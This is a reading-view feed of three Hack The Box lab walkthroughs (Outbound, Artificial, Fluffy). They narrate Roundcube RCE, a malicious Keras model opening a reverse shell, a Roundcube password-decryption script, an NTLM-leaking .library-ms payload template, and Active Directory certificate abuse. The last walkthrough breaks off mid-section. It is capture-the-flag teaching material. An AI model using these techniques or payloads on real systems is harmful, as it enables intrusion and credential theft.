Reading view

There are new articles available, click to refresh the page.

Hack The Box: Outbound Machine Walkthrough – Easy Difficulity

✇Threatninja.net
By: darknite
Reading Time: 11 minutes

Introduction to Outbound:

In this write-up, we will explore the “Outbound” machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Outbound” machine from Hack The Box by achieving the following objectives:

User Flag:

The initial foothold was achieved by exploiting CVE‑2025‑49113 in Roundcube version 1.6.10 using Tyler’s valid credentials. This vulnerability in the file upload feature allowed remote code execution, enabling a reverse shell that was upgraded to a fully interactive shell. Investigation of the Roundcube configuration revealed the database credentials, which were used to access the MariaDB instance. Within the database, Jacob’s encrypted session data was located and decrypted using the known DES key, revealing his plaintext password. Using this password, SSH authentication was successful, providing access to Jacob’s environment and allowing the retrieval of the user flag.

Root Flag:

Privilege escalation was identified through sudo -l, which showed that the user could execute /usr/bin/below. Research revealed that the installed version of below is vulnerable to CVE‑2025‑27591, which involves a world-writable /var/log/below directory with permissions set to 0777. Exploiting this vulnerability using the publicly available Python PoC allowed execution of commands as root. Leveraging this access, the root flag was retrieved by reading the /root/root.txt file.

Enumerating the Outbound Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine. 

nmap -sC -sV 10.10.11.77 -oA initial

Nmap Output: 

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBN9Ju3bTZsFozwXY1B2KIlEY4BA+RcNM57w4C5EjOw1QegUUyCJoO4TVOKfzy/9kd3WrPEj/FYKT2agja9/PM44=
|   256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH9qI0OvMyp03dAGXR0UPdxw7hjSwMR773Yb9Sne+7vD
80/tcp open  http    syn-ack ttl 63 nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Analysis:

  • Port 22: Running OpenSSH 9.6p1, providing secure remote access.
  • Port 80: Running nginx 1.24.0, redirecting to the Roundcube webmail portal.

Web Application Exploration:

Accessing the http://mail.outbound.htb portal reveals a Roundcube Webmail interface. We can proceed to log in using the provided credentials.

Entering the Tyler credentials allows us to access the Roundcube Webmail interface.

After accessing the email portal, the inbox appears to be empty.

Roundcube Webmail 1.6.10 service enumeration and analysis on Outbound machine

After logging in, the first step is to check the Roundcube version. In this case, it is running version 1.6.10.

Another way to verify the version is by checking the information embedded in the page’s source code.

After doing some research, I discovered that this version is affected by a known vulnerability, identified as CVE-2025-49113.

CVE‑2025‑49113: Critical Vulnerability in Roundcube on Outbound machine

CVE‑2025‑49113 is a serious vulnerability in Roundcube Webmail versions up to 1.5.9 and 1.6.10. It occurs in the upload.php feature, where certain input parameters are not properly validated. An attacker with valid user credentials can exploit this flaw to execute arbitrary code on the server by sending a specially crafted payload. This can allow the attacker to run commands, install backdoors, or take further control of the system. The vulnerability is particularly dangerous because it requires minimal technical effort once credentials are obtained, and proof-of-concept exploits are publicly available. Applying the patched versions 1.5.10 or 1.6.11 and above is necessary to secure the system.

How the Exploit Works

The script begins by checking whether the Roundcube instance is running a vulnerable version. If it is, it continues with the login process. Once authenticated, it uploads a normal-looking PNG file to the server. During this upload, the exploit carries out two key injections: one targeting the PHP session via the _from parameter in the URL, and another that slips a malicious object into the filename field of the _file parameter. When combined, these injections trigger code execution on the server, allowing the attacker to execute commands remotely.

You can download the Python script from the following repository: https://github.com/00xCanelo/CVE-2025-49113.

This command runs the exploit script and requires four arguments: the target Roundcube URL, a valid username, the corresponding password, and the system command you want the server to execute.

The upload went through successfully.

Unfortunately, it didn’t produce any outcome.

I changed the payload to use a base64‑encoded command.

The attempt failed once more.

I replaced the script with the PHP version from https://github.com/hakaioffsec/CVE-2025-49113-exploit. Unexpectedly, the script hung, and that’s a positive indication.

Finally, it worked successfully.

Tyler user account enumeration and analysis

So, let’s proceed using Tyler’s credentials.

Improve the shell to a full interactive one.

I couldn’t locate any files related to the configuration.

Since the application uses Roundcube, let’s check for the configuration file at /var/www/html/roundcube/config/config.inc.php.

This configuration file defines the essential settings for the Roundcube Webmail installation. It specifies the MySQL database connection using the credentials roundcube:RCDBPass2025 on the local database server, which Roundcube relies on to store its data. The file also sets the IMAP and SMTP servers to localhost on ports 143 and 587, meaning both incoming and outgoing mail services run locally, and Roundcube uses the user’s own login credentials for SMTP authentication. The product name is set to Roundcube Webmail, and the configuration includes a 24‑character DES key used for encrypting IMAP passwords in session data. Additionally, the installation enables the archive and zipdownload plugins and uses the elastic skin for its interface. Overall, this file contains the key operational and security‑sensitive parameters needed for Roundcube to function.

The commands show a successful login to the MariaDB database using the roundcube user account with the password RCDBPass2025. After entering the password, access to the MariaDB monitor is granted, allowing the user to execute SQL commands. The prompt confirms that the server is running MariaDB version 10.11.13 on Ubuntu 24.04, and provides standard information about the database environment, including copyright details and basic usage instructions. This access enables management of the Roundcube database, including querying, updating, or modifying stored data.

The commands demonstrate exploring the MariaDB instance after logging in as the roundcube user. First, show databases; lists all databases on the server, revealing the default information_schema and the roundcube database, which stores the webmail application’s data. Next, use roundcube; switches the context to the Roundcube database, allowing operations within it. Running show tables; displays all the tables in the database, totaling 17, which include tables for caching (cache, cache_index, cache_messages, etc.), email contacts (contacts, contactgroups, contactgroupmembers), user identities (identities, users), and other operational data (session, system, filestore, responses, searches). These tables collectively manage Roundcube’s functionality, storing user accounts, session data, cached messages, and other configuration or runtime information necessary for the webmail system.

This snippet appears to be a serialized Roundcube session or user configuration for the account jacob. It stores settings such as the user ID, username, encrypted password, IMAP server details (localhost:143), mailbox information (e.g., INBOX with 2 unseen messages), session tokens, authentication secret, timezone (Europe/London), UI preferences like skin and layout, and other session-related flags. Essentially, it contains all the data Roundcube needs to manage the user’s session, mailbox view, and preferences while interacting with the webmail interface.

Creating a Python script to recover the plaintext password from encrypted session data.

#!/usr/bin/env python3
import base64
from Crypto.Cipher import DES3
from Crypto.Util.Padding import unpad

DES_KEY = 'rcmail-!24ByteDESkey*Str'  # Roundcube 3DES key (24 bytes)


def extract_iv_and_data(b64_string):
    """Decode base64 and split into IV + encrypted data."""
    raw = base64.b64decode(b64_string)
    return raw[:8], raw[8:]


def create_cipher(des_key, iv):
    """Return a 3DES CBC cipher instance."""
    key = des_key.encode('utf-8')[:24]
    return DES3.new(key, DES3.MODE_CBC, iv)


def decrypt_value(b64_string, des_key):
    """Decrypt a Roundcube-encrypted base64 string."""
    try:
        iv, encrypted = extract_iv_and_data(b64_string)
        cipher = create_cipher(des_key, iv)

        decrypted_padded = cipher.decrypt(encrypted)

        # Remove padding safely
        try:
            decrypted = unpad(decrypted_padded, DES3.block_size)
        except:
            decrypted = decrypted_padded.rstrip(b'\x00\x01\x02\x03\x04\x05\x06\x07\x08')

        return decrypted.decode('utf-8', errors='ignore').strip(), iv, encrypted

    except Exception as e:
        return f"Decryption failed: {str(e)}", None, None


def print_decryption(label, data, des_key):
    """Helper to decrypt and print results in structured form."""
    plaintext, iv, encrypted = decrypt_value(data, des_key)

    print(f"[{label}]")
    print(f"  Base64: {data}")
    print(f"  Plaintext: {plaintext}")

    if iv is not None:
        print(f"  IV: {iv.hex()}")
        print(f"  Encrypted(hex): {encrypted.hex()}")
    print()


def main():
    # Extracted values
    username = "jacob"
    password_b64 = "L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"
    auth_secret_b64 = "DpYqv6maI9HxDL5GhcCd8JaQQW"
    request_token_b64 = "TIsOaABA1zHSXZOBpH6up5XFyayNRHaw"

    print("\n=== Roundcube Password / Token Decryptor ===\n")
    print(f"Using DES Key: {DES_KEY}\n")

    print(f"User: {username}\n")

    print_decryption("Password", password_b64, DES_KEY)
    print_decryption("Auth Secret", auth_secret_b64, DES_KEY)
    print_decryption("Request Token", request_token_b64, DES_KEY)

    print("Decryption Method: 3DES CBC (IV extracted from base64)")


if __name__ == "__main__":
    main()

This Python script is designed to decrypt Roundcube webmail passwords (and similar session tokens) that are stored in 3DES-encrypted form. Key points:

  • Decryption Method: Uses 3DES in CBC mode with a 24-byte key (des_key) and an 8-byte IV extracted from the start of the base64-encoded data.
  • Encrypted Data Handling: The script first base64-decodes the input, separates the IV (first 8 bytes) from the encrypted payload, and then decrypts it.
  • Padding Removal: After decryption, it removes PKCS#5/7 padding with unpad; if that fails, it manually strips extra bytes.
  • Target Data: In this example, it decrypts the user jacob’s password (L7Rv00A8TuwJAr67kITxxcSgnIk25Am/) along with the auth_secret and request_token.
  • Output: Shows the plaintext password, IV, and encrypted data in hex for analysis.

The decrypted Roundcube credentials reveal the username jacob with the plaintext password 595mO8DmwGeD. These credentials can now be tested for SSH authentication to determine whether the same password is reused across services. Since password reuse is common in misconfigured environments, attempting SSH login with these details may provide direct shell access to the target system.

The email content from Jacob’s mailbox shows two messages. The first, from Tyler, notifies Jacob of a recent password change and provides a temporary password gY4Wr3a1evp4, advising Jacob to update it upon next login. The second email, from Mel, informs Jacob about unexpected high resource consumption on the main server. Mel mentions that resource monitoring has been enabled and that Jacob has been granted privileges to inspect the logs, with a request to report any irregularities immediately. Together, these emails reveal sensitive information including temporary credentials and access responsibilities for server monitoring.

We’re now able to access and read the user flag.

Escalate to Root Privileges Access on the Outbound machine

Privilege Escalation:

Consistent with the earlier hint, sudo -l reveals sudo access to /usr/bin/below.

After investigating below, we found its GitHub project. In the Security section, the advisory GHSA-9mc5-7qhg-fp3w is listed.

This advisory describes an Incorrect Permission Assignment for a Critical Resource affecting version 0.9.0. Inspecting the /var/log/below directory, we see that its permissions are set to 0777, meaning it is world-writable. This confirms the advisory’s impact, as anyone can create or modify files in this directory.

Mapping the Vulnerability to CVE‑2025‑27591

Further research shows that this vulnerability is tracked as CVE‑2025‑27591, and a PoC is publicly available.

Upload the Python script to the compromised host.

Using the exploit from the following source: BridgerAlderson’s CVE‑2025‑27591 PoC on GitHub.

We can read the root flag simply by running cat root.txt.

The post Hack The Box: Outbound Machine Walkthrough – Easy Difficulity appeared first on Threatninja.net.

Hack The Box: Artificial Machine Walkthrough – Easy Diffucilty

✇Threatninja.net
By: darknite
Reading Time: 11 minutes

Introduction to Artificial:

In this writeup, we will explore the “Artificial” machine from Hack The Box, categorized as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Artificial” machine from Hack The Box by achieving the following objectives:

User Flag:

The user flag is obtained by scanning the “Artificial” machine, identifying a web server on port 80, and creating an account to access its dashboard. The dashboard allows uploading .h5 files, so a malicious .h5 file is crafted to trigger a reverse shell. After setting up a Docker environment and uploading the file, a shell is gained as the app user. A SQLite database (users.db) is found, and cracking its password hashes reveals credentials for the user gael. Logging in via SSH as gael allows retrieval of the user flag from user.txt.

Root Flag:

To escalate to root, a scan reveals port 9898 running Backrest. Forwarding this port and enumerating the service uncovers backup files and a config.json with a bcrypt-hashed password. Decoding a base64 value yields a plaintext password, granting access to a Backrest dashboard. Exploiting the RESTIC_PASSWORD_COMMAND feature in the dashboard triggers a root shell, allowing the root flag to be read from root.txt.

Enumerating the Artificial Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine. 

nmap -sC -sV -oA initial 10.10.11.74

Nmap Output: 

┌─[dark@parrot]─[~/Documents/htb/artificial]
└──╼ $nmap -sC -sV -oA initial 10.10.11.74
# Nmap 7.94SVN scan initiated Mon Oct 20 10:13:11 2025 as: nmap -sC -sV -oA initial 10.10.11.74
Nmap scan report for 10.10.11.74
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7c:e4:8d:84:c5:de:91:3a:5a:2b:9d:34:ed:d6:99:17 (RSA)
|   256 83:46:2d:cf:73:6d:28:6f:11:d5:1d:b4:88:20:d6:7c (ECDSA)
|_  256 e3:18:2e:3b:40:61:b4:59:87:e8:4a:29:24:0f:6a:fc (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://artificial.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 20 10:13:51 2025 -- 1 IP address (1 host up) scanned in 39.96 seconds

Analysis:

  • Port 22 (SSH): Runs OpenSSH 8.2p1 on Ubuntu 4ubuntu0.13 (protocol 2.0), providing secure remote access with RSA, ECDSA, and ED25519 host keys.
  • Port 80 (HTTP): Hosts an nginx 1.18.0 web server on Ubuntu, redirecting to http://artificial.htb/, indicating a web application to explore.

Web Application Exploration on an Artificial Machine:

At this stage, the target appears to host a standard website with no immediately visible anomalies or interactive elements.

I actively created a new user account to interact with the application and test its features.

Using the credentials created earlier, I logged into the application.

Finally, access to the dashboard was successfully obtained as shown above.

At this point, the application requires a file to be uploaded.

Two links appear interesting to explore: requirements and Dockerfile.

The main dashboard endpoint returned a response with status 200 OK.

Further analysis of the response revealed that the upload functionality only accepts files in the .h5 format.

Analyzing Application Dependencies

As the dashboard response showed nothing significant, I focused on analyzing the previously downloaded file.

The requirements.txt specifies tensorflow-cpu==2.13.1, indicating that the application’s dependencies rely on this TensorFlow version. Attempting to install it outside of a TensorFlow-compatible environment will result in errors.

The Dockerfile creates a Python 3.8 slim environment, sets the working directory to /code, and installs curl. It then downloads the TensorFlow CPU wheel (tensorflow_cpu-2.13.1) and installs it via pip. Finally, it sets the container to start with /bin/bash. This ensures that the environment has TensorFlow pre-installed, which is required to run the application or handle .h5 files.

Setting Up the Docker Environment

While trying to install the requirements, I faced an error stating they need a TensorFlow environment.

I could install TensorFlow locally, but its large file size causes issues. Even after freeing up disk space, the installation fails due to insufficient storage.

Crafting the Exploit

The script constructs and saves a Keras model incorporating a malicious Lambda layer: upon loading the model or executing the layer, it triggers an os.system command to establish a named pipe and launch a reverse shell to 10.10.14.105:9007. Essentially, the .h5 file serves as an RCE payload—avoid loading it on any trusted system; examine it solely in an isolated, disposable environment (or through static inspection) and handle it as potentially harmful.

Proceed within an isolated Python virtual environment (venv) to analyze the file; perform static inspection only and avoid importing or executing the model.

Installing TensorFlow remains necessary.

Following careful thought, I selected a Docker environment to execute the setup, seeking to bypass local dependency or storage problems.

I built and tagged the Docker image successfully.

At this stage, the Docker environment is running without any issues.

The command updates the package lists and installs the OpenBSD version of Netcat (netcat-openbsd) to enable network connections for testing or reverse shells.

netcat-openbsd — lightweight TCP/UDP swiss-army knife

netcat-openbsd is a lightweight, versatile networking utility commonly used in HTB and pentests to create raw TCP/UDP connections, transfer files, and receive reverse shells. The OpenBSD build omits the risky -e/–exec option present in some older variants, but it still pipes stdin/stdout over sockets, so only use it in authorised, isolated lab environments (examples: nc -l -p PORT to listen, nc HOST PORT to connect) .

Ultimately, I executed the script successfully, achieving the expected outcome—a reverse shell to 10.10.14.105:9007—as demonstrated above.

Executing the Reverse Shell

Consequently, I generated an .h5 model file.

I launched a netcat listener on 10.10.14.105:9007 to receive the incoming reverse shell.

I uploaded the exploit.h5 file to the application’s file upload endpoint to initiate model processing.

Successfully uploading the file and clicking the View Predictions button activates the embedded payload.

Page displayed a loading state, indicating that the payload is likely executing.

Gaining Initial Access

The shell connection successfully linked back to my machine.

Upgrading the reverse shell to a fully interactive session simplified command execution.

Gained an interactive shell as the application user app.

Found a Python file named app.py in the application directory.

The app.py section reveals a hard-coded Flask secret key, Sup3rS3cr3tKey4rtIfici4L, sets up SQLAlchemy to utilize a local SQLite database at users.db, and designates the models directory for uploads. The fixed key allows session manipulation or cookie crafting, the SQLite file serves as a simple target for obtaining credentials or tokens, and the specified upload path indicates where malicious model files are kept and can be executed—collectively offering substantial opportunities for post-exploitation and privilege escalation.

Located a users.db file that appears to be the application’s SQLite database; it likely contains user records, password hashes, and session data, making it a prime target for credential extraction and privilege escalation.

Downloaded users.db to our own machine using netcat for offline analysis.

Verification confirms users.db is a SQLite 3.x database.

Extracting Credentials

Extracted password hashes from the users.db (SQLite3) for offline cracking and analysis.

Apart from the test account, I extracted password hashes from the remaining user accounts in the SQLite database for offline cracking and analysis.

Configured hashcat to the appropriate hash mode for the extracted hash type, then launched the cracking job against the dump.

Cracking the hashes revealed two plaintext passwords, but the absence of corresponding usernames in the dataset blocked immediate account takeover.

An easier verification is to use nc — we accessed the user gael with the password mattp005numbertwo.

Authenticated to the target via SSH as user gael using the recovered password, yielding an interactive shell.

The user flag was read by running cat user.txt.

Escalate to Root Privileges Access on Artificial machine

Privilege Escalation:

Artificial host lacks a sudo binary, preventing sudo-based privilege escalation.

Port scan revealed 9898/tcp open — likely a custom service or web interface; enumerate it further with banner grabs, curl, or netcat.

Established a port-forward from the target’s port 9898 to a local port to interact with the service for further enumeration.

Exploring the Backrest Service

Exploring the forwarded port 9898 revealed Backrest version 1.7.2 as the running service.

Attempting to authenticate to Backrest with gael’s credentials failed.

Enumerated the Backrest service and discovered several files within its accessible directories.

Enumeration of the Backrest instance revealed several accessible directories, each containing files that warrant further inspection for credentials, configuration data, or backup artefacts.

The install.sh file contains configuration settings that appear standard at first glance, with no immediately suspicious entries.

However, scrolling further reveals sections resembling backup configuration, suggesting the script may handle sensitive data or database dumps.

Analyzing Backup Configurations

Focused on locating backup files referenced in the configuration for potentially sensitive data.

Discovering multiple backup files revealed a substantial amount of stored data potentially containing sensitive information.

Copying the backup file to /tmp enabled local inspection and extraction.

Successfully copying the backup file made it available in /tmp for analysis.

Unzipping the backup file in /tmp allowed access to its contents for further inspection.

Several files contained the keyword “password,” but the config.json file appeared unusual or suspicious upon inspection.

Discovered a potential username and a bcrypt-hashed password. Because bcrypt uses salting and is intentionally slow, offline cracking requires a tool like hashcat or John that supports bcrypt, paired with wordlists/rules and significant computational resources; alternatively, explore safe credential reuse checks on low-risk services or conduct password spraying in a controlled lab setting.

Decoding a base64-encoded value uncovered the underlying data.

Recovered the plaintext password after decoding the base64-encoded value.

Credentials recovered earlier were submitted to the service to attempt authentication.

A different dashboard was successfully accessed using the recovered credentials.

To create a new Restic repository, you first need to initialise a storage location where all encrypted backups will be kept

While adding the Restic repository via environment variables, I noticed that RESTIC_PASSWORD is required. I also discovered an interesting variable, RESTIC_PASSWORD_COMMAND, which can execute a command to retrieve the password.

What RESTIC_PASSWORD_COMMAND?

RESTIC_PASSWORD_COMMAND tells restic to run the given command and use its stdout as the repository password. It’s convenient for integrating with secret stores or helper scripts, but it’s dangerous if an attacker can control that environment variable or the command it points to.

The shell can be triggered by selecting “Test Configuration”.

The root flag can be accessed by running cat root.txt.

The post Hack The Box: Artificial Machine Walkthrough – Easy Diffucilty appeared first on Threatninja.net.

Hack The Box: Fluffy Machine Walkthrough – Easy Difficulity

✇Threatninja.net
By: darknite
Reading Time: 9 minutes

Introduction to Fluffy:

In this write-up, we will explore the “Fluffy” machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Machine Information
In this scenario, similar to real-world Windows penetration tests, you begin the Fluffy machine with the following credentials: j.fleischman / J0elTHEM4n1990!.

Objective:

The goal of this walkthrough is to complete the “Fluffy” machine from Hack The Box by achieving the following objectives:

User Flag:

Initial access was gained by exploiting CVE-2025-24071 with a malicious .library-ms file delivered via SMB. The victim’s NTLMv2-SSP hash was captured with Responder and cracked using Hashcat (mode 5600), revealing prometheusx-303. Domain enumeration with BloodHound showed p.agila@fluffy.htb had GenericAll rights over Service Accounts, enabling control of winrm_svc.

Root Flag:

We escalated privileges by abusing the ca_svc account, which is a member of Service Accounts and Cert Publishers, granting it AD CS access. Using Certipy, we identified an ESC16 vulnerability, updated ca_svc’s userPrincipalName to impersonate the administrator, generated a certificate, and obtained both a TGT and the NT hash.

Enumerating the Fluffy Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine. 

nmap -sV -sC -oA initial -Pn 10.10.11.69

Nmap Output: 

┌─[dark@parrot]─[~/Documents/htb/fluffy]
└──╼ $nmap -sV -sC -oA initial -Pn 10.10.11.69
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-18 02:49:59Z)
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-18T02:51:30+00:00; +4h17m24s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-18T02:51:30+00:00; +4h17m24s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17

Analysis:

  • 53/tcp (DNS): Handles domain name resolution; check for zone transfer misconfigurations.
  • 88/tcp (Kerberos): Confirms Active Directory; use for Kerberos user enumeration or ticket attacks.
  • 139/tcp (NetBIOS-SSN): Legacy Windows file/printer sharing; enumerate shares and sessions.
  • 389/tcp (LDAP): Queryable directory service; useful for enumerating AD users, groups, and policies.
  • 445/tcp (SMB): Provides file sharing and remote management; test for SMB enumeration and null sessions.
  • 464/tcp (kpasswd5): Kerberos password change service; abuseable in AS-REP roasting or password reset attacks.
  • 636/tcp (LDAPS): Encrypted LDAP; secure channel for directory queries, still useful for enumeration if authenticated.
  • 3269/tcp (GC over SSL): Global Catalog LDAP over SSL; enables cross-domain AD enumeration.

Samba Enumeration

We discovered the Samba share as shown above.

By using impacket-smbclient with the provided credentials, we were able to gain access as shown above.

There are several files saved inside the directory, but one file in particular caught my attention — Upgrade_Notice.pdf.

We proceeded to download the PDF to our local machine.

Exploitability Research

A screenshot of a computer AI-generated content may be incorrect.

The PDF outlines the upgrade process and highlights several key vulnerabilities:

  • CVE-2025-24996 (Critical): External control of file names/paths in Windows NTLM, enabling network spoofing and possible unauthorized access.
  • CVE-2025-24071 (Critical): Windows File Explorer spoofing vulnerability where crafted .library-ms files in archives trigger SMB connections, leaking NTLM hashes without user action.
  • CVE-2025-46785 (High): Buffer over-read in Zoom Workplace Apps for Windows that allows an authenticated user to trigger network-based denial of service.
  • CVE-2025-29968 (High): Improper input validation in Microsoft AD CS leading to denial of service and potential system disruption.
  • CVE-2025-21193 (Medium): CSRF-based spoofing in Active Directory Federation Services, primarily impacting confidentiality.
  • CVE-2025-3445 (Low): Path traversal in Go library mholt/archiver, allowing crafted ZIPs to write files outside intended directories, risking data overwrite or misuse.

No other significant information appeared that we could leverage in this context.

CVE-2025-24071: Windows File Explorer SMB NTLM Disclosure

A screenshot of a computer program AI-generated content may be incorrect.

Vulnerable Code Analysis (CVE-2025-24071)

Malicious File Generation


The exploit dynamically creates an XML file with a hardcoded SMB path (\\attacker_ip\shared), which Windows automatically processes:

library_content = f"""
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\{ip_address}\\shared</url>  <!-- Vulnerable: Triggers SMB -->
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

Manual Exploitation Process

Therefore, we proceeded to exploit it using the manual method, starting with the creation of a malicious .library-ms file.

Once the malicious .library-ms file is successfully created, it needs to be compressed into a ZIP archive.

Initiate the Responder and monitor the incoming network packets for analysis.

As a result, we transferred the malicious.zip to the victim’s machine using smbclient.

We captured the NTLMv2-SSP hash and can now attempt to crack it.

Credential Recovery via Hash Cracking

The hash was successfully cracked within one minute, revealing the password: prometheusx-303.

BloodHound Active Directory Enumeration

We proceeded to enumerate the environment using BloodHound.

Analyzing BloodHound Enumeration Data

The account p.agila@fluffy.htb is a member of the Service Account Managers@fluffy.htb group, which has GenericAll permissions over the Service Accounts@fluffy.htb group. This means p.agila can fully manage members of the Service Accounts group, including adding, removing, or modifying accounts — a powerful privilege that can be leveraged for privilege escalation.

The accounts ldap_svc@fluffy.htb, ca_svc@fluffy.htb, and winrm_svc@fluffy.htb all belong to the service accounts@fluffy.htb group. They share similar privilege levels and likely support service-related operations, creating a common attack surface if an attacker compromises any one of them.

The domain hierarchy shows that authenticated users@fluffy.htb are members of everyone@fluffy.htb, with domain users inheriting from both authenticated users and users. Authenticated users also have pre-Windows 2000 and Certificate Service DCOM access. The ca_svc account belongs to domain users, service accounts, and cert publishers. While cert publishers is part of the Denied RODC Password Replication Group (blocking password replication to RODCs), it retains certificate publishing rights.

Performing a Certipy Shadow Attack on Fluffy Machine

It is also possible to add the user p.agila to the SERVICE ACCOUNTS group.

This process retrieves the NT hash, and you can repeat it for the other two users. The name winrm_svc indicates that you can access it directly through WinRM and authenticate using the hash.

The command uses Certipy to authenticate as the user winrm_svc with a captured NT hash against the domain controller DC01.fluffy.htb. By specifying both the domain controller IP and the target IP, it attempts to perform a pass-the-hash attack, enabling access without needing the plaintext password.

This data contains a substantial amount of information that requires careful analysis and processing.

I noticed the presence of the Cert Publishers group.

Retrieving the User Flag on Fluffy Machine

We can access the machine using the winrm_svc account by leveraging its NT hash.

A screenshot of a computer screen AI-generated content may be incorrect.

We can read the user flag by executing the command type user.txt.

Escalate to Root Privileges Access on Fluffy Machine

Privilege Escalation:

A computer screen with green text AI-generated content may be incorrect.

This command leverages Certipy in combination with ntpdate to adjust the system time, targeting the user ca_svc with the specified NT hash against the domain fluffy.htb. The -stdout option directs the output to the console, and the -vulnerable flag identifies potentially exploitable accounts or services. This method facilitates pass-the-hash or Kerberos-related enumeration while accounting for time-based restrictions in the environment.

Privilege Escalation via ESC16 Misconfiguration

A screenshot of a computer AI-generated content may be incorrect.

The Certificate Authority (CA) DC01.fluffy.htb is vulnerable to ESC16, a misconfiguration that allows abusing certificate templates for privilege escalation. While the WINRM_SVC account lacks elevated privileges, its CA access provides a path to target higher-privileged accounts, such as the administrator.

Vulnerabilities
ESC16: The disabled Security Extension leaves the system susceptible to abuse.

Remarks
ESC16 may require additional prerequisites. Refer to the official wiki for guidance.

A computer screen with green text AI-generated content may be incorrect.

We executed the Certipy account command to update the ca_svc account on the fluffy.htb domain. Using the credentials of p.agila@fluffy.htb (prometheusx-303) and targeting the domain controller at 10.10.11.69, we modified the account’s userPrincipalName to administrator. This modification allows the account to perform actions with elevated privileges, enabling further privilege escalation within the environment.

A screenshot of a computer program AI-generated content may be incorrect.

Using Certipy’s shadow command, we performed automated Kerberos-based credential extraction for the ca_svc account on fluffy.htb. Authenticated as p.agila@fluffy.htb (prometheusx-303) and targeting 10.10.11.69, Certipy generated a certificate and key credential, temporarily added it to ca_svc’s Key Credentials, and authenticated as ca_svc. It obtained a TGT, saved the cache to ca_svc.ccache, and retrieved the NT hash (ca0f4f9e9eb8a092addf53bb03fc98c8). Certipy then restored ca_svc’s original Key Credentials. Finally, we set KRB5CCNAME=ca_svc.ccache to enable subsequent Kerberos operations with the extracted credentials.

Using Certipy, we issued a certificate request with the req command, targeting the domain controller DC01.FLUFFY.HTB and the Certificate Authority fluffy-DC01-CA, while specifying the User template. Although we did not explicitly provide the DC host, Kerberos authentication handled the request over RPC. The Certificate Authority successfully processed the request (Request ID 15) and issued a certificate for the administrator user principal. The certificate did not include an object SID, with a note suggesting the -sid option if needed. We saved the certificate and its private key to administrator.pfx, completing the process.

A black screen with green text AI-generated content may be incorrect.

The command uses Certipy to update the ca_svc account on the domain fluffy.htb. Authenticated as p.agila@fluffy.htb with the password prometheusx-303 and targeting the domain controller at 10.10.11.69, the account’s userPrincipalName is set to ca_svc@fluffy.htb. Certipy confirms that the update was successful, ensuring the ca_svc account reflects the correct user principal name for subsequent operations.

Administrator Authentication Using Certipy

A computer screen with green text AI-generated content may be incorrect.

